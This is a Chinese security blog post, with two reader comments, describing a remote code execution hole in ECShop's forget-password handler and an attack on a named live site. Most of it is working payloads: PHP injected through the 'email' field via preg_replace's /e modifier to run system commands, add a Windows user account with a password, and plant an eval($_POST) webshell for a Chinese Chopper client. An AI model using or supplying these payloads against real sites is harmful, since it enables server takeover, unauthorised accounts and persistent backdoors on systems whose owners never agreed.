您的位置 » 首页 » 实用工具 » ecshop远程代码执行漏洞

ecshop远程代码执行漏洞

发表于4年前 | 作者: seay | 分类: 实用工具 | 孵化于:2012年08月04日 | 文章热度:12,893 次 全屏阅读

显示不全请点击全屏阅读

Php code injection
Target:http://www.cunlide.com/(可能是作者网站)
ecshop 版本不祥 貌似09
awvs 扫之存在sql注入、php code injection、等等多种漏洞。
开始试验各种exp 无果
Php code injection 需要post提交这个蛋疼么
system 权限
 act=forget_pwd&action=get_pwd&email=${@print(system(‘net user’))}&user_name=furybijj
无果

二蛋说去掉system之后改%60

 act=forget_pwd&action=get_pwd&email=$%7B@print(%60net user SUPPORT_388945a1 lifelongz%60)%7D&user_name=furybijj
果断成功

其实这个也可以直接用菜刀 connect.

在配置里写下:

 <O>act=forget_pwd&action=get_pwd&email=${eval($_POST[test])}&user_name=furybijj</O>
主要利用代码如下:
 act=forget_pwd&action=get_pwd&email=%24%7b%40print%28%60net%20user%60%29%7d&user_name=furybijj

 act=forget_pwd&action=get_pwd&email=%24%7b%40eval%28%24_POST%5bfuck%5d%29%7d&user_name=furybijj
漏洞的原因是

data/config.php
 define(‘EC_CHARSET’,’utf-8′);
@preg_replace(“/[email]/e”,$_POST[’email’],”error”);#万恶

Tags:

ECshop漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/600/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有2个筒子的人留下了脚印...

  • xiaoks 说:
    1楼
    2012 年 8 月 22 日 上午 7:21 回复

    怎么利用啊 看不懂啊

  • abc 说:
    2楼
    2012 年 9 月 10 日 下午 3:49 回复

    act=forget_pwd&action=get_pwd

    应该是找回密码页面的问题,php函数preg_replace e修饰符造成的代码执行漏洞。具体搜百度。email没有进行过滤。

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)